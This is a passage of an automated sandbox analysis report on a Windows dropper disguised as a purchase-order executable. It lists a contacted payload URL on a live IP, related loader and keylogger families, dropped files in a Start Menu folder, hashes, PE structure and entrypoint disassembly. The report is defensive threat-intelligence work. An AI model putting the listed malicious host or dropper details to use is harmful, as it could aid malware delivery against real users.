              http://185.222.57.90/zFSrvbrRquo53.binjPurchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2668899476.00000000046C6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.0000000000649000.00000008.00000001.01000000.00000006.sdmpfalse
                		high
                http://185.222.57.90/Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2668899476.0000000004688000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                185.222.57.90
                		unknownNetherlands
                		51447ROOTLAYERNETNLfalse

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1557894
                Start date and time:2024-11-18 18:17:24 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 8m 27s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Run name:Run with higher sleep bypass
                Number of analysed new started processes analysed:15
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:Purchase Order Purchase Order Purchase Order Purchase Order.exe
                Detection:MAL
                Classification:mal88.troj.evad.winEXE@3/8@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 90%
                • Number of executed functions: 47
                • Number of non-executed functions: 302
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: Purchase Order Purchase Order Purchase Order Purchase Order.exe

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                185.222.57.90NK098765434567890-87654345678.exeGet hashmaliciousNanocoreBrowse
                  NAC0098765434567890-09876.exeGet hashmaliciousNanocoreBrowse
                    RHK098760045678009000.exeGet hashmaliciousNanocoreBrowse
                      FHKPO098765432345.exeGet hashmaliciousRemcosBrowse

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        ROOTLAYERNETNL9dOKGgFNL2.exeGet hashmaliciousRedLineBrowse
                        • 45.137.22.126
                        RFQ List and airflight 2024.pif.exeGet hashmaliciousPureLog StealerBrowse
                        • 45.137.22.174
                        Calyciform.exeGet hashmaliciousGuLoaderBrowse
                        • 45.137.22.248
                        I5pvP0CU6M.exeGet hashmaliciousRedLineBrowse
                        • 45.137.22.248
                        gLsenXDHxP.exeGet hashmaliciousRedLineBrowse
                        • 185.222.58.240
                        DEVIS + FACTURE.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 45.137.22.126
                        PZNfhfaj9O.exeGet hashmaliciousRedLineBrowse
                        • 185.222.58.80
                        ZxS8mP8uE6.exeGet hashmaliciousRedLineBrowse
                        • 45.137.22.123
                        nu28HwzQwC.exeGet hashmaliciousRedLineBrowse
                        • 185.222.58.52

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Users\user\AppData\Local\Temp\nsk59ED.tmp\System.dllMG-Docu6800001.exeGet hashmaliciousGuLoaderBrowse
                          Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            Factura Honorarios 2024-11-17.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                              JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                rCEMG242598.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  SBSLMD5qhm.msiGet hashmaliciousMetasploitBrowse
                                    mU4lYkmS6K.exeGet hashmaliciousCobaltStrikeBrowse
                                      SBSLMD5qhm.msiGet hashmaliciousMetasploitBrowse
                                        mU4lYkmS6K.exeGet hashmaliciousCobaltStrikeBrowse

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\nsk59ED.tmp\System.dll

                                          Download File
                                          Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):11776
                                          Entropy (8bit):5.890541747176257
                                          Encrypted:false
                                          SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
                                          MD5:75ED96254FBF894E42058062B4B4F0D1
                                          SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
                                          SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
                                          SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 3%
                                          Joe Sandbox View:
                                          • Filename: MG-Docu6800001.exe, Detection: malicious, Browse
                                          • Filename: Fac.exe, Detection: malicious, Browse
                                          • Filename: Factura Honorarios 2024-11-17.exe, Detection: malicious, Browse
                                          • Filename: JOSHHHHHH.exe, Detection: malicious, Browse
                                          • Filename: rCEMG242598.exe, Detection: malicious, Browse
                                          • Filename: SBSLMD5qhm.msi, Detection: malicious, Browse
                                          • Filename: mU4lYkmS6K.exe, Detection: malicious, Browse
                                          • Filename: SBSLMD5qhm.msi, Detection: malicious, Browse
                                          • Filename: mU4lYkmS6K.exe, Detection: malicious, Browse
                                          Reputation:moderate, very likely benign file
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Clap\Exoascaceous73.tra

                                          Download File
                                          Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):249837
                                          Entropy (8bit):1.2410746997695157
                                          Encrypted:false
                                          SSDEEP:768:d6sbjlB29qJBBoYbES9BCDKXC9HOak6p6MDrQsv8Ajldp8tEcf0TeMhz3CqXuwl7:tf1wx3et4e+lL5WwgzfZTc
                                          MD5:F1A91A75CAAA712680DA4475E1CDA954
                                          SHA1:C341696CBB8AF494821F8D16EA5E30B7827F5393
                                          SHA-256:79C33E51A0D2271F4252D793D8B9BCEF9F1F817FF3E61C94ECC59E615EC68DCE
                                          SHA-512:F43E478ADCCAF2CBD9FF9F2A4F920B63F53A82E028CD5ADFB41896EC04EB626FD15E283CB35D8C4D2A95EA8B5A7E59102A8A306C4DF60375C257A04150616906
                                          Malicious:false
                                          Reputation:low
                                          Preview:......................................................................................................................2......w...........................................................................d..... ........S........................R..............................I..................................................f.................................~....p................-.........\...........................................D..........................7.......................D.........................................."..J....................................................................|U.....W.....................................$.....B.....j..............................R.............................................................-..................G..............=.....................2.........[..'.....H......................u.......]............R........g.........................................................p...................................|..........................

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Atomizing.Eft

                                          Download File
                                          Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          File Type:TTComp archive data, binary, 4K dictionary
                                          Category:dropped
                                          Size (bytes):40687
                                          Entropy (8bit):4.5997894189869815
                                          Encrypted:false
                                          SSDEEP:384:KydpqkEFLRpyBDIag9EJG15JghsD4q3R3TD/FS0v29Akde6QYqOmN3LIV9re3bef:woFgH1EsM8H/UakYEI7I8LLgk4P
                                          MD5:35D47296CFB14E694BC97D22A92D42A1
                                          SHA1:BD0C529FFF26F900DB7948353F87377A31D0890D
                                          SHA-256:52716A62B0CE128607785167F560D0890D4C79CFEF11E677945720D4B691F858
                                          SHA-512:925F88965A2CF617F060E3A5464B8E601C4C5F963FBD955FE35AD7F72759C72E44742486295F51342DB8633600E5F97FF764E0222DD6B53931F93303F9407BE0
                                          Malicious:false
                                          Reputation:low
                                          Preview:........gg.....0..............~~.........mm.2.......==.BB......^^...kk.............NNN...S............L..3............````..WWWW................................................S.................ww...sss.....l.QQQ.......................................v.......i.......U.....................www.7777....................SSS....------......3............ZZZ..qqqqq............2...................5555.............-.......dd..........+....3.6....7............;............!.********.XX............jjj...............IIIIII..............................qqqq.............b..............................V......{...[[[[....[[[......T.....b......z.gg.......pppp....................W...........................KK....v................................................7.B..11...........yyyyy................M.........................LL..................................................%.............Z.5............,,..dd........55..0..~.............b.vvvv..r..........iii...............................''............

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes\vec.jpg

                                          Download File
                                          Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 600x600, segment length 16, progressive, precision 8, 337x200, components 1
                                          Category:dropped
                                          Size (bytes):5453
                                          Entropy (8bit):7.8833870423876355
                                          Encrypted:false
                                          SSDEEP:96:Jh/2gZ62nmh8h8hMA8cZZ5wq1dJlH999YqYYYSJ9nv79i2+7nllbx0:j+gZ62nypZsqnJlH999Lv7I7a
                                          MD5:1732F2BFFA1308AABB19AA7006DFE151
                                          SHA1:80974B7DC8AFF2267C3502433C9DBDCCE04BD68C
                                          SHA-256:F99C88579EF1BF9BE2A9442D6E0B61BAC01BE74E9EC96A844D3CE0E49E89B889
                                          SHA-512:9DE1E2D1028E9FC4938CA1A4DE274513632319B411E2E1797DAAC80AD1D8C220ABD410612DDA28B6FA58BAD6A591234A675AEA0AE29B0EF75E9776BE91993C1C
                                          Malicious:false
                                          Reputation:low
                                          Preview:......JFIF.....X.X.....C................................... $.' ",#..(7),01444.'9=82<.342........Q..............................................=.|'......M.R....;n....8y.....@.2Uo........S......'.]"P.{`......8x..1Sd..H...a..3.]......_......?..p....>...>....1.f..n..>A...........5.+tv...c..............}'.b.....O.........^g...5.............5.+s....Z....O.........[....+[.A...........5.+tr...kzh>...>....1.f..n.\......W._......?..p......M.......>....1.f..y...A..I....>....1.f..k.K..}...}....c..g....|.../........k8V..C.._.~.......3Y.Gj.b..94.....3zf&....=..'........Q.,v...I5..!...?}K...~....6.?....p./\...g.O.....9..o.~....7...........................V.67T..1@. 25A..!..03$U&Qa...........g........Hq.`.s....X...n,Y}A..e.......;./..Z...,B1..J{h..F..V...+.O.V....t../G#....D.....Y..\K/.oZ".:....G.n.B......;m6.;.m..p..4....F...h.v.m.w..M.N..i.i.;m6.;.m..p..4....F...h.v.m.w..M.N..i.i.;m6.;.m..p..4....F...h.v.m.w..M.N..i.i.;m6.;.m...a...#..%.wL{G..p=..LNq.+...\J..1

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Underemphasizing70.tio

                                          Download File
                                          Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):290718
                                          Entropy (8bit):1.2554775771524807
                                          Encrypted:false
                                          SSDEEP:768:tCp+qklylxDqcoTQYGEujA28gHCxgzdobjCp3zxBMpnz4G+KrbwdmCClgE+JQH0/:+DqcWd2ikx8zkwT0sH7FZJ9dmMg9Fb
                                          MD5:C3ACEFE77EA0A60EFDFBC53EF527E6DD
                                          SHA1:84064B562F74D054254FDC6012E83248F4C10DB2
                                          SHA-256:01AB1D43FD91C8715A0FE5D4D3EA6A4DFD0FF6DCA3BFE95DE026B97DD246260B
                                          SHA-512:01B8D1253A15345F35304860BC91AC0EFE9DFD4AE91022326DD1E509C0CC37BE401DE24AA2096B4C2B17D7B965F904C80ECCDB4157C1FD366FA90226DE198D1E
                                          Malicious:false
                                          Preview:.........................$................p...................T..............................Z..............................'....................(...............................................................(.Y.................W...........m............6..........................>.........................................................................................................................................c........k.V.................................4.;F..0.........................M..............1...........[4................O......].......&................(.........................................p..................................................................................K....~...................n........................................................................................................................................................Q.......................D..........................)........:.......|.................................).....................

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\sulkens.dic

                                          Download File
                                          Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):484483
                                          Entropy (8bit):1.2566608257372598
                                          Encrypted:false
                                          SSDEEP:1536:k00wcig7ANvjuzHnVWM5DNgLiOavUv9tkj8:Wwci1O1WABgT92j8
                                          MD5:BDF9F6FA5F7851BD46CFAD3859D1D2CA
                                          SHA1:9352199243642CAD95D4870883238F1E06E3D13D
                                          SHA-256:AF12000C4E3E6C57CE444368D50A3E7F737647C0DECD597AAA307F26C0B1BFBF
                                          SHA-512:A99C33BCB4D65AF35FA970BDB84332FCC7C284C2017F135C81DE28EC4D1867E1F341CB6A0DCD1B254E816DD2D435FC469536F9D8779FB10455BAF6846FE1A625
                                          Malicious:false
                                          Preview:..................................m........................................d......T..k.:.......0.....t...^............m....................................s..............7.................M................................................................................S......................S.......c..............o...............................].............................................H.............. ......).......................................^..3.....W....}..............................................................\...P...................1...u......&............................*................................................................Z.....L............}.........G.@.V.6...............................................................................A..........................................[....................R..........................s..........-............................i.........................o.........+.........................n....K..g......................

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Vedbendens\Hoveddelenes.haa

                                          Download File
                                          Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):281853
                                          Entropy (8bit):7.7902641113783515
                                          Encrypted:false
                                          SSDEEP:6144:qv8q7vHyznD3c0MG0KXtSYaAzhtG1CDta+0kLbYMLezAL1T8K8P/k:lKfqbcX/ySYaAbG1QJLkMMALNbEs
                                          MD5:63B84085F6C377FCB26E75EBD1F83BE4
                                          SHA1:6E6A61DCD1CB093FAC560085E5DC384E3F5C3E66
                                          SHA-256:B63205EDDA324ADC71C16D51D5C4169CEBA89794FAEAF1D0F5809AAEFF256840
                                          SHA-512:F4F43853270F28C405C4FD386094058A5FB9138D237411C60B08FCD97AE176414F8049A0626FD9F02C7571EBAE200AB5FDB4C20896E873B0FDEE23443EFF815C
                                          Malicious:false
                                          Preview:..**..".55........AAA..........p./........................eeeee...................===........................``.......x..................fff........................RRRR.........................\......KKKKKKK..11..........................u.....__...t....********................................M..R.+++............z....................%%.....S........))................8.........................................nnn.\\.....ccccc......555.pppp..""......zzzzz.-............B........^..........................i...........II.......................*...))...k..8..........``..................h.................................M........A.........@@.|..???..........*...........W......}..%.B........................>..O....tt..iiiiii......`...**...................s........oo...$$....^^^^..........SSSSS.Q.__........nn........7.........@@@.................SS.........................5.............__...................III... ..qq...............).....t...PP.................g..GGG..........W.|..,,.....o.......

                                          C:\Windows\Fonts\Gullis.lnk

                                          Download File
                                          Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                          Category:modified
                                          Size (bytes):1454
                                          Entropy (8bit):3.192863723268913
                                          Encrypted:false
                                          SSDEEP:24:8+rxWLgD4/BV02Dejq8wKoy+pu8wKoyjC0ee92Fdqy:8u8gDszhee8wKUpu8wKlC0ee9CUy
                                          MD5:55A582437B4B3CC2C714564C6371E738
                                          SHA1:0CF79F478868D1BF1386A00B81838AB2DDCE0D9D
                                          SHA-256:FDF8DBDD977021EDF1373C25FB4EE880DCEF683CE5A1D8447AAC2006E33F242C
                                          SHA-512:46676A6A734F6F90310C046F47B6EFFE2C86A5A82FA986831B0B2CD79E277D7B46A32EE07A7D2570989092872DB1FC4E96A8D3983B2CC6890B1E0780A31D011E
                                          Malicious:false
                                          Preview:L..................F........................................................!....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....\.1...........user.D............................................f.r.o.n.t.d.e.s.k.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....t.1...........Printer Shortcuts.T............................................P.r.i.n.t.e.r. .S.h.o.r.t.c.u.t.s... .t.2...........lensaftalerne.sla.T............................................l.e.n.s.a.f.t.a.l.e.r.n.e...s.l.a... ...[.....\.....\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.P.r.i.n

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.618058158790601
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          File size:724'333 bytes
                                          MD5:b9a03fb0c2c7f23a1e4ccb0d79c5053c
                                          SHA1:4d87c4ed89d8b92f2b6849dc6af6a8850f8e5e7c
                                          SHA256:099369eb025c3e23b6669c872ac2572e7bc4ba9200eb4d6318284983ddb78e3f
                                          SHA512:7b39c7eb08b12f947a2f5fb79f91a7c8fb738fa14c2539db55f207754438f5b340d5ae5219ec1ea6861cb72aad32e04d2b701cc6a34c098e0a780db3607be3d2
                                          SSDEEP:12288:d35ol8MJEBhQRtZZbhhLSbWJgU8UFJ6UibZP9/I7TAWWtQnm:d3kJEBORt7b3Oa2Udi9P9yTB0Qnm
                                          TLSH:46F4E061227BCC66F38492B04556E23D8EA6EEC62971C33757F2EF5BB518F723818211
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...<.oZ.................h.........

                                          File Icon

                                          Icon Hash:7b3b5a7232162613

                                          Static PE Info

                                          General

                                          Entrypoint:0x40338f
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x5A6FED3C [Tue Jan 30 03:57:48 2018 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:b34f154ec913d2d2c435cbd644e91687

                                          Entrypoint Preview

                                          Instruction
                                          sub esp, 000002D4h
                                          push ebx
                                          push esi
                                          push edi
                                          push 00000020h
                                          pop edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [esp+14h], ebx
                                          mov dword ptr [esp+10h], 0040A2E0h
                                          mov dword ptr [esp+1Ch], ebx
                                          call dword ptr [004080A8h]
                                          call dword ptr [004080A4h]
                                          and eax, BFFFFFFFh
                                          cmp ax, 00000006h
                                          mov dword ptr [00434EECh], eax
                                          je 00007FC474826B63h
                                          push ebx
                                          call 00007FC474829E15h
                                          cmp eax, ebx
                                          je 00007FC474826B59h
                                          push 00000C00h
                                          call eax
                                          mov esi, 004082B0h
                                          push esi
                                          call 00007FC474829D8Fh
                                          push esi
                                          call dword ptr [00408150h]
                                          lea esi, dword ptr [esi+eax+01h]
                                          cmp byte ptr [esi], 00000000h
                                          jne 00007FC474826B3Ch
                                          push 0000000Ah
                                          call 00007FC474829DE8h
                                          push 00000008h
                                          call 00007FC474829DE1h
                                          push 00000006h
                                          mov dword ptr [00434EE4h], eax
                                          call 00007FC474829DD5h
                                          cmp eax, ebx
                                          je 00007FC474826B61h
                                          push 0000001Eh
                                          call eax
                                          test eax, eax
                                          je 00007FC474826B59h
                                          or byte ptr [00434EEFh], 00000040h
                                          push ebp
                                          call dword ptr [00408044h]
                                          push ebx
                                          call dword ptr [004082A0h]
                                          mov dword ptr [00434FB8h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+34h]
                                          push 000002B4h
                                          push eax
                                          push ebx
                                          push 0042B208h
                                          call dword ptr [00408188h]
                                          push 0040A2C8h

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x86080xa0.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000x308e8.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x66270x68008c030dfed318c62753a7b0d60218279bFalse0.6642503004807693data6.452235553722483IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x80000x149a0x1600966a3835fd2d9407261ae78460c26dccFalse0.43803267045454547data5.007075185851696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0xa0000x2aff80x600939516377e7577b622eb1ffdc4b5db4aFalse0.517578125data4.03532418489749IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .ndata0x350000x2e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x630000x308e80x30a00f3073287865b6dba616e9c916f34371aFalse0.4013245099614396data5.74891499046254IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_BITMAP0x633e80x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                          RT_ICON0x637500x10a00Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.25190906954887216
                                          RT_ICON0x741500x9600Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.2941666666666667
                                          RT_ICON0x7d7500x7600PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9859970868644068
                                          RT_ICON0x84d500x5600Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.309093386627907
                                          RT_ICON0x8a3500x4400Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.35167738970588236
                                          RT_ICON0x8e7500x2600Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.38003700657894735
                                          RT_ICON0x90d500x1200Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4377170138888889
                                          RT_ICON0x91f500xa00Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.508203125
                                          RT_ICON0x929500x600Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.4524739583333333
                                          RT_DIALOG0x92f500x144dataEnglishUnited States0.5216049382716049
                                          RT_DIALOG0x930980x13cdataEnglishUnited States0.5506329113924051
                                          RT_DIALOG0x931d80x100dataEnglishUnited States0.5234375
                                          RT_DIALOG0x932d80x11cdataEnglishUnited States0.6056338028169014
                                          RT_DIALOG0x933f80xc4dataEnglishUnited States0.5918367346938775
                                          RT_DIALOG0x934c00x60dataEnglishUnited States0.7291666666666666
                                          RT_GROUP_ICON0x935200x84dataEnglishUnited States0.7803030303030303
                                          RT_MANIFEST0x935a80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                          Imports

                                          DLLImport
                                          KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                          USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                          SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
